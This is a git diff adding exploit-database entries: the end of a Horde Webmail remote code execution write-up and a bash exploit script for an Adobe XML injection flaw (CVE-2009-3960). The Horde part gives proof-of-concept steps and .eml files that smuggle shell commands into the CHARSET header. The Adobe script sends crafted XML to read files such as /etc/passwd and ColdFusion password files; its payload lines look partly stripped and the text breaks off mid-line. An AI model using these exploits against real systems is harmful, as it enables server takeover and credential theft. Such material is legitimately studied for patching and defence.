+/* 620 */ ); +/* 621 */ } +/* 622 */ if (($params['type'] === 'detached-signature') && +/* 623 */ !isset($params['signature'])) { +/* 624 */ throw new InvalidArgumentException( +/* 625 */ 'The detached PGP signature block is required to verify the +signed message.' +/* 626 */ ); +/* 627 */ } +/* 628 */ +/* 629 */ $func = 'decryptSignature'; +/* 630 */ break; +/* ... */ +/* 650 */ $this->_initDrivers(); +/* 651 */ +/* 652 */ foreach ($this->_backends as $val) { +/* 653 */ try { +/* 654 */ return $val->$func($text, $params); +/* 655 */ } catch (Horde_Crypt_Exception $e) {} +/* 656 */ } +/* ... */ + +decrypt() with needed parameters is used in verifySignature(): + +Path – /imp/lib/Crypt/Pgp.php + +/* 339 */ public function verifySignature($text, $address, $signature = '', +/* 340 */ $charset = null) +/* 341 */ { +/* 342 */ if (!empty($signature)) { +/* 343 */ $packet_info = $this->pgpPacketInformation($signature); +/* 344 */ if (isset($packet_info['keyid'])) { +/* 345 */ $keyid = $packet_info['keyid']; +/* 346 */ } +/* 347 */ } +/* 349 */ if (!isset($keyid)) { +/* 350 */ $keyid = $this->getSignersKeyID($text); +/* 351 */ } +/* 353 */ /* Get key ID of key. 
*/ +/* 354 */ $public_key = $this->getPublicKey($address, array('keyid' => $keyid)); +/* 356 */ if (empty($signature)) { +/* 357 */ $options = array('type' => 'signature'); +/* 358 */ } else { +/* 359 */ $options = array('type' => 'detached-signature', 'signature' +=> $signature); +/* 360 */ } +/* 361 */ $options['pubkey'] = $public_key; +/* 363 */ if (!empty($charset)) { +/* 364 */ $options['charset'] = $charset; +/* 365 */ } +/* 369 */ return $this->decrypt($text, $options); +/* 370 */ } + +verifySignature() is called from _outputPGPSigned(): + +Path – /imp/lib/Mime/Viewer/Pgp.php + +/* 387 */ protected function _outputPGPSigned() +/* 388 */ { +/* 389 */ global $conf, $injector, $prefs, $registry, $session; +/* 390 */ +/* 391 */ $partlist = array_keys($this->_mimepart->contentTypeMap()); +/* 392 */ $base_id = reset($partlist); +/* 393 */ $signed_id = next($partlist); +/* 394 */ $sig_id = Horde_Mime::mimeIdArithmetic($signed_id, 'next'); +/* 395 */ +/* 396 */ if (!$prefs->getValue('use_pgp') || empty($conf['gnupg']['path'])) { +/* 397 */ return array( +/* 398 */ $sig_id => null +/* 399 */ ); +/* 400 */ } +/* ... */ +/* 417 */ if ($prefs->getValue('pgp_verify') || +/* 418 */ $injector->getInstance('Horde_Variables')->pgp_verify_msg) { +/* 419 */ $imp_contents = $this->getConfigParam('imp_contents'); +/* 420 */ $sig_part = $imp_contents->getMIMEPart($sig_id); +/* ... */ +/* 433 */ try { +/* 434 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp'); +/* 435 */ if ($sig_raw = +$sig_part->getMetadata(Horde_Crypt_Pgp_Parse::SIG_RAW)) { +/* 436 */ $sig_result = $imp_pgp->verifySignature($sig_raw, +$this->_getSender()->bare_address, null, $sig_part- +> getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET)); +/* ... */ + +And it is used in _renderInline(): + +Path – /imp/lib/Mime/Viewer/Pgp.php + +/* 134 */ protected function _renderInline() +/* 135 */ { +/* 136 */ $id = $this->_mimepart->getMimeId(); +/* 138 */ switch ($this->_mimepart->getType()) { +/* ... 
*/ +/* 142 */ case 'multipart/signed': +/* 143 */ return $this->_outputPGPSigned(); + +Let’s go back to _outputPGPSigned() method. We can see a few +requirements before the needed call: + +$conf[‘gnupg’][‘path’] should be not empty. This value can be edited +only by admin(if he/she wants to allow users to use GPG feature he/she +needs to define value for this config). +Current user has enabled “use_pgp” feature in his preferences +Current user has enabled “pgp_verify” feature in his preferences +Current user has enabled “pgp_verify” feature in his preferences + +Also we see that our charset value is taken from $sig_part -> +getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET) + +Our value will be stored during parsing of PGP parts: + +Path – /Horde/Crypt/Pgp/Parse.php + +/* 150 */ public function parseToPart($text, $charset = 'UTF-8') +/* 151 */ { +/* 152 */ $parts = $this->parse($text); +/* ... */ +/* 162 */ while (list(,$val) = each($parts)) { +/* 163 */ switch ($val['type']) { +/* ... */ +/* 200 */ case self::ARMOR_SIGNED_MESSAGE: +/* 201 */ if ((list(,$sig) = each($parts)) && +/* 202 */ ($sig['type'] == self::ARMOR_SIGNATURE)) { +/* 203 */ $part = new Horde_Mime_Part(); +/* 204 */ $part->setType('multipart/signed'); +/* 205 */ // TODO: add micalg parameter +/* 206 */ $part->setContentTypeParameter('protocol', +'application/pgp-signature'); +/* 207 */ +/* 208 */ $part1 = new Horde_Mime_Part(); +/* 209 */ $part1->setType('text/plain'); +/* 210 */ $part1->setCharset($charset); +/* 211 */ +/* 212 */ $part1_data = implode("\n", $val['data']); +/* 213 */ $part1->setContents(substr($part1_data, strpos($part1_data, +"\n\n") + 2)); +/* 214 */ +/* 215 */ $part2 = new Horde_Mime_Part(); +/* 216 */ +/* 217 */ $part2->setType('application/pgp-signature'); +/* 218 */ $part2->setContents(implode("\n", $sig['data'])); +/* 219 */ +/* 220 */ $part2->setMetadata(self::SIG_CHARSET, $charset); +/* 221 */ $part2->setMetadata(self::SIG_RAW, implode("\n", +$val['data']) . "\n" . 
implode("\n", $sig['data'])); +/* 222 */ +/* 223 */ $part->addPart($part1); +/* 224 */ $part->addPart($part2); +/* 225 */ $new_part->addPart($part); +/* 226 */ +/* 227 */ next($parts); +/* 228 */ } +/* 229 */ } +/* 230 */ } +/* 231 */ +/* 232 */ return $new_part; +/* 233 */ } + +It is called from _parsePGP(): + +Path – /imp/lib/Mime/Viewer/Plain.php + +× +1 +2 +3 +4 +5 +6 +7 +8 +/* 239 */ protected function _parsePGP() +/* 240 */ { +/* 241 */ $part = +$GLOBALS['injector']->getInstance('Horde_Crypt_Pgp_Parse')->parseToPart( +/* 242 */ new Horde_Stream_Existing(array( +/* 243 */ 'stream' => $this->_mimepart->getContents(array('stream' => true)) +/* 244 */ )), +/* 245 */ $this->_mimepart->getCharset() +/* 246 */ ); + +Our charset value is taken from CHARSET attribute of Content-Type +header of parent MIMEpart. + +_parsePGP() is used in _getEmbeddedMimeParts() method and from Horde +Webmail ver 5.2.0 it looks like: + +Path – /imp/lib/Mime/Viewer/Plain.php + +/* 222 */ protected function _getEmbeddedMimeParts() +/* 223 */ { +/* 224 */ $ret = $this->getConfigParam('pgp_inline') +/* 225 */ ? $this->_parsePGP() +/* 226 */ : null; + +We can see an additional requirement – our function will be called +only if ‘pgp_inline‘ config parameter is “true”. It is defined in: + +Path – /imp/config/mime_drivers.php + +/* 37 */ /* Scans the text for inline PGP data. If true, will strip this data +/* 38 */ * out of the output (and, if PGP is active, will display the +/* 39 */ * results of the PGP action). */ +/* 40 */ 'pgp_inline' => false + +Default value is false, so the major part of Horde servers is not +vulnerable and our attack is relevant only if an admin manually has +changed this line to ‘pgp_inline‘ => true. 
+
+But in older versions (before 5.2.0) the code of
+_getEmbeddedMimeParts() is a bit different:
+
+Path – /imp/lib/Mime/Viewer/Plain.php
+
+/* 227 */ protected function _getEmbeddedMimeParts()
+/* 228 */ {
+/* 229 */ $ret = null;
+/* 230 */
+/* 231 */ if (!empty($GLOBALS['conf']['gnupg']['path']) &&
+/* 232 */ $GLOBALS['prefs']->getValue('pgp_scan_body')) {
+/* 233 */ $ret = $this->_parsePGP();
+/* 234 */ }
+
+So instead of requirement to have config parameter we have requirement
+of ‘pgp_scan_body‘ Preference of current user. And it is more likely
+to find a victim with needed preferences. We saw where our injected
+command is executed and from where and when it is taken
+
+During rendering of massage we:
+
+Will parse PGP values:
+
+#0 IMP_Mime_Viewer_Plain->_parsePGP() called at
+[/imp/lib/Mime/Viewer/Plain.php:225]
+#1 IMP_Mime_Viewer_Plain->_getEmbeddedMimeParts() called at
+[/Horde/Mime/Viewer/Base.php:298]
+#2 Horde_Mime_Viewer_Base->getEmbeddedMimeParts() called at
+[/imp/lib/Contents.php:1114]
+#3 IMP_Contents->_buildMessage() called at [/imp/lib/Contents.php:1186]
+#4 IMP_Contents->getContentTypeMap() called at [/imp/lib/Contents.php:1423]
+#5 IMP_Contents->getInlineOutput() called at
+[/imp/lib/Ajax/Application/ShowMessage.php:296]
+
+Will use them in:
+
+#0 IMP_Mime_Viewer_Plain->_parsePGP() called at
+[/imp/lib/Mime/Viewer/Plain.php:225]
+#0 IMP_Mime_Viewer_Pgp->_renderInline() called at
+[/Horde/Mime/Viewer/Base.php:156]
+#1 Horde_Mime_Viewer_Base->render() called at [/Horde/Mime/Viewer/Base.php:207]
+#2 Horde_Mime_Viewer_Base->_renderInline() called at
+[/Horde/Mime/Viewer/Base.php:156]
+#3 Horde_Mime_Viewer_Base->render() called at [/imp/lib/Contents.php:654]
+#4 IMP_Contents->renderMIMEPart() called at [/imp/lib/Contents.php:1462]
+#5 IMP_Contents->getInlineOutput() called at
+[/imp/lib/Ajax/Application/ShowMessage.php:296]]
+
+In conclusions:
+
+If Horde server has vulnerable configuration:
+
+Enabled “GnuPG feature” (there is path to gpg binary in
+$conf[gnupg][path] setting)
+Only for ver 5.2.0 and newer: ‘pgp_inline’ => true, in
+/imp/config/mime_drivers.php
+
+And the victim has checked the next checkbox in his/her preferences (
+“PGP Configure PGP encryption support.” in Prefferences->Mail) :
+
+“Enable PGP functionality”
+“Should PGP signed messages be automatically verified when viewed?” if
+it is not checked our command will be executed when the victim clicks
+on the link “Click HERE to verify the message.”
+For versions before 5.2.0: “Should the body of plaintext message be
+scanned for PGP data”
+
+An attacker can create email with PGP data, put desired command into
+CHARSET attribute of ContentType header, and this command will be
+executed on Horde server when the victim opens this email.
+
+Proof of Concept – Remote Code Execution
+
+For Proof of Concept we can use preconfigured image of Horde server
+from Bitnami (Bitnami – “Easy to use cloud images, containers, and VMs
+that work on any platform”):
+
+https://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova
+
+Step 1 – Login as admin (by default user:bitnami) and go to
+Administration -> Configuration and choose Horde (horde). Open GnuPG
+tab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click
+“Generate Horde Configuration“:
+
+Now we have enabled GPG feature on our server and we can login as
+regular user and try to execute desired commands. But Bitnami image
+does not have installed and configured Mail server so we need to use
+external one or install it on local machine.
+
+We will use gmail account (to be able to login to it from Horde I had
+to change Gmail account setting Allow less secure apps: ON).
+
+To use external Mail server we need to change the next setting:
+“Administrator Panel” -> “Configuration” -> “Horde” ->
+“Authentication”
+
+Configure the application authentication ($conf[auth][driver]) –
+change this option to “Let a Horde application handle authentication”
+and click “Generate Horde Configuration”.
+
+If we have Horde Webmail ver 5.2.0 or newer we need to edit
+/imp/config/mime_drivers.php file. Login to the console of bitnami
+image (default bitnami:bitnami) and run the next command:
+
+sudo nano /opt/bitnami/apps/horde/htdocs/imp/config/mime_drivers.php
+
+Change the line: “‘pgp_inline’ => false” to “‘pgp_inline’ => true” and
+save the changes.
+
+Step 2 – Logout and login with your gmail account.
+
+Step 3 – Go to Preferences -> Mail and click on PGP link:
+
+Check Enable PGP functionality checkbox and click “Save”
+Check Should PGP signed messages be automatically verified when viewed checkbox
+For versions before 5.2.0 check “Should the body of plain-text message
+be scanned for PGP data” checkbox Click “Save”
+
+For version before 5.2.0:
+
+Step 4 – Go to the Mail, take any mail folder (for example Drafts),
+and chose “Import” item from context menu and import attack_whoami.eml
+file (in the end of this blog).
+
+Click on the imported email:
+
+Our Horde serve is launched under daemon user
+
+Step 5 – We can do the same with attack_touch.eml (in the end of this
+blog) file (import it and click on the new mail) and check /tmp
+folder:
+
+attack_touch.eml
+
+Date: Fri, 04 Nov 2016 16:04:19 +0000
+Message-ID: <20161104160419.Horde.HpYObg_3-4QS-nUzWujEkg3@ubvm.mydomain.com>
+From: Donald Trump
+To: SomeUser@mydoamin.com
+Subject: PGP_INLine_touch_tmp_youarevuln
+X-IMP-Draft: Yes
+Content-Type: text/plain; CHARSET="US-ASCII`touch /tmp/youarevuln`";
+format=flowed; DelSp=Yes
+MIME-Version: 1.0
+Content-Disposition: inline
+
+
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+This is a sample of a clear signed message.
+
+-----BEGIN PGP SIGNATURE-----
+Version: 2.6.2
+
+iQCVAwUBMoSCcM4T3nOFCCzVAQF4aAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF
+U5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh
+DztuhjzJMEzwtm8KTKBnF/LJ9X05pSQUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz
+CvynscaD+wA=
+=Xb9n
+-----END PGP SIGNATURE-----
+
+attack_whoami.eml
+
+Date: Fri, 04 Nov 2016 16:04:19 +0000
+Message-ID: <20161104160419.Horde.HpYObg_3-4QS-nUzWujEkg3@ubvm.mydomain.com>
+From: Donald Trump
+To: SomeUser@mydoamin.com
+Subject: PGP_INLine_whoami
+X-IMP-Draft: Yes
+Content-Type: text/plain; CHARSET=US-ASCII`whoami`; format=flowed; DelSp=Yes
+MIME-Version: 1.0
+Content-Disposition: inline
+
+
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+This is a sample of a clear signed message.
+
+-----BEGIN PGP SIGNATURE-----
+Version: 2.6.2
+
+iQCVAwUBMoSCcM4T3nOFCCzVAQFJaAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF
+U5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh
+DztuhjzJMEzwtm8KTKBnF/LJ9X05pSsUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz
+CvynscaD+wA=
+=Xb9n
+-----END PGP SIGNATURE-----
\ No newline at end of file
diff --git a/platforms/xml/webapps/41855.sh b/platforms/xml/webapps/41855.sh
new file mode 100755
index 000000000..2c81c5dc2
--- /dev/null
+++ b/platforms/xml/webapps/41855.sh
@@ -0,0 +1,228 @@
+#!/bin/bash
+#
+# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh
+# Exploit Title: Adobe XML Injection file content disclosure
+# Date: 07-04-2017
+# Exploit Author: Thomas Sluyter
+# Website: https://www.kilala.nl
+# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html
+# Version: Multiple Adobe products
+# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise
+# CVE : 2009-3960
+#
+# Shell script that let's you exploit a known XML injection vulnerability
+# in a number of Adobe products, allowing you to read files that are otherwise
+# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject
+# This script is a Bash implementation of the PoC multiple/dos/11529.txt.
+#
+# According to the original Metasploit code, this attack works with:
+# "Multiple Adobe Products: BlazeDS 3.2 and earlier versions,
+# LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1,
+# and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2"
+#
+
+
+PROGNAME="$(basename $0)" # This script
+TIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles
+SCRATCHFILE="/tmp/${PROGNAME}.${TIMESTAMP}" # Used as generic scratchfile
+EXITCODE="0" # Assume success, changes on errors
+CURL="/usr/bin/curl" # Other locations are detected with "which"
+
+SSL="0" # Overridden by -s
+DEBUG="0" # Overridden by -d
+BREAKFOUND="0" # Overridden by -b
+TARGETHOST="" # Overridden by -h
+TARGETPORT="8400" # Overridden by -p
+READFILE="/etc/passwd" # Overridden by -f
+
+
+################################## OVERHEAD SECTION
+#
+# Various functions for overhead purposes.
+#
+
+# Defining our own logger function, so we can switch between stdout and syslog.
+logger() {
+ LEVEL="$1"
+ MESSAGE="$2"
+
+ # You may switch the following two, if you need to log to syslog.
+ #[[ ${DEBUG} -gt 0 ]] && echo "${LEVEL} $MESSAGE" || /usr/bin/logger -p ${LEVEL} "$MESSAGE"
+ [[ ${DEBUG} -gt 0 ]] && echo "${LEVEL} $MESSAGE" || echo "${LEVEL} $MESSAGE"
+}
+
+
+ExitCleanup() {
+ EXITCODE=${1}
+ rm -f ${SCRATCHFILE}* >/dev/null 2>&1
+ echo ""
+ exit ${EXITCODE}
+}
+
+
+# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script
+ValidIP() {
+ local IP=${1}
+ local STAT=1
+
+ if [[ ${IP} =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]
+ then
+ OIFS=$IFS; IFS='.'
+ IP=(${IP})
+ IFS=$OIFS
+ [[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]]
+ stat=$?
+ fi
+ return $stat
+}
+
+
+# Function to output help information.
+show-help() {
+ echo ""
+ cat << EOF
+ ${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file]
+
+ -? Show this help message.
+ -d Debug mode, outputs more kruft on stdout.
+ -s Use SSL / HTTPS, instead of HTTP.
+ -b Break on the first valid answer found.
+ -h Target host
+ -p Target port, defaults to 8400.
+ -f Full path to file to grab, defaults to /etc/passwd.
+
+ This script exploits a known vulnerability in a set of Adobe applications. Using one
+ of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is
+ normally inaccessible.
+
+ NOTE: Windows paths use \\, so be sure to properly escape them when using -f! For example:
+ ${PROGNAME} -h 192.168.1.20 -f c:\\\\coldfusion8\\\\lib\\\\password.properties
+ ${PROGNAME} -h 192.168.1.20 -f 'c:\\coldfusion8\\lib\\password.properties'
+
+ This script relies on CURL, so please have it in your PATH.
+
+EOF
+}
+
+
+# Parsing and verifying the passed parameters.
+OPTIND=1
+while getopts "?dsbh:p:f:" opt; do
+ case "$opt" in
+ \?) show-help; ExitCleanup 0 ;;
+ d) DEBUG="1" ;;
+ s) SSL="1" ;;
+ b) BREAKFOUND="1" ;;
+ h) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)
+ ValidIP ${OPTARG}; if [[ $? -eq 0 ]]
+ then TARGETHOST=${OPTARG}
+ else TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}')
+ [[ $? -gt 0 ]] && (logger ERROR "Target host ${TARGETHOST} not found in DNS."; ExitCleanup 1)
+ fi ;;
+ p) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)
+ if [[ ! -z $(echo ${OPTARG} | tr -d '[:alnum:]') ]]
+ then logger ERROR "Target port ${OPTARG} is incorrect."; ExitCleanup 1
+ else TARGETPORT=${OPTARG}
+ fi ;;
+ f) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)
+ if [[ (-z $(echo ${OPTARG} | grep ^\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]]
+ then logger ERROR "File is NOT specified with full Unix or Windows path."; ExitCleanup 1
+ else READFILE=${OPTARG}
+ fi ;;
+ *) show-help; ExitCleanup 0 ;;
+ esac
+done
+
+[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR "CURL was not found."; ExitCleanup 1)
+[[ -z ${TARGETHOST} ]] && (logger ERROR "Target host was not set."; ExitCleanup 1)
+
+[[ ${DEBUG} -gt 0 ]] && logger DEBUG "Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}."
+
+
+################################## GETTING TO WORK
+#
+#
+
+PATHLIST=("/flex2gateway/" "/flex2gateway/http" "/flex2gateway/httpsecure" \
+ "/flex2gateway/cfamfpolling" "/flex2gateway/amf" "/flex2gateway/amfpolling" \
+ "/messagebroker/http" "/messagebroker/httpsecure" "/blazeds/messagebroker/http" \
+ "/blazeds/messagebroker/httpsecure" "/samples/messagebroker/http" \
+ "/samples/messagebroker/httpsecure" "/lcds/messagebroker/http" \
+ "/lcds/messagebroker/httpsecure" "/lcds-samples/messagebroker/http" \
+ "/lcds-samples/messagebroker/httpsecure")
+
+echo "" > ${SCRATCHFILE}
+echo " ]>" >> ${SCRATCHFILE}
+echo "" >> ${SCRATCHFILE}
+echo "" >> ${SCRATCHFILE}
+echo "bodyclientIdcorrelationIddestination" >> ${SCRATCHFILE}
+echo "headersmessageIdoperationtimestamp" >> ${SCRATCHFILE}
+echo "timeToLive" >> ${SCRATCHFILE}
+echo "DSIdDSMessagingVersionnil" >> ${SCRATCHFILE}
+echo "1&x3;500" >> ${SCRATCHFILE}
+
+if [[ ${DEBUG} -gt 0 ]]
+then
+ logger DEBUG "XML file sent to target host reads as follows:"
+ echo "======================================"
+ cat ${SCRATCHFILE}
+ echo "======================================"
+ echo ""
+fi
+
+let CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1
+
+for ADOBEPATH in "${PATHLIST[@]}"
+do
+ [[ ${SSL} -gt 0 ]] && PROTOCOL="https" || PROTOCOL="http"
+ URI="${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}"
+
+ [[ ${DEBUG} -gt 0 ]] && logger DEBUG "Proceeding with URI: ${URI}"
+
+ # Header contents based on a tcpdump capture of original exploit being
+ # run from Metasploit.
+ HEADER="-H \"Host: ${TARGETHOST}\" -H \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" -H \"Content-Type: application/x-www-form-urlencoded\" -H \"Content-Length: ${CONTENTLENGTH}\""
+ CURLPOST="${CURL} -X POST -k -s --http1.1 ${HEADER} -w \"%{http_code}\" -d @- ${URI}"
+ [[ ${DEBUG} -gt 0 ]] && logger DEBUG "Using this CURL command: ${CURLPOST}"
+ # The tr command dikes out any non-ASCII characters which might mess with output.
+ CURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\11\12\15\40-\176' 2>&1)
+
+ # Output is pretty garbled and the HTTP return code is enclosed in double quotes.
+ # I need to grab the last 5 chars (includes NULL EOF) and remove the ".
+ CURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:])
+
+ if [[ ${DEBUG} -gt 0 ]]
+ then
+ logger DEBUG "CURL was given this HTTP return code: ${CURLCODE}."
+ logger DEBUG "Output from CURL reads as follows:"
+ echo "======================================"
+ echo "${CURLOUTPUT}"
+ echo "======================================"
+ echo ""
+ fi
+
+ logger INFO "${CURLCODE} for ${URI}"
+
+ if [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep "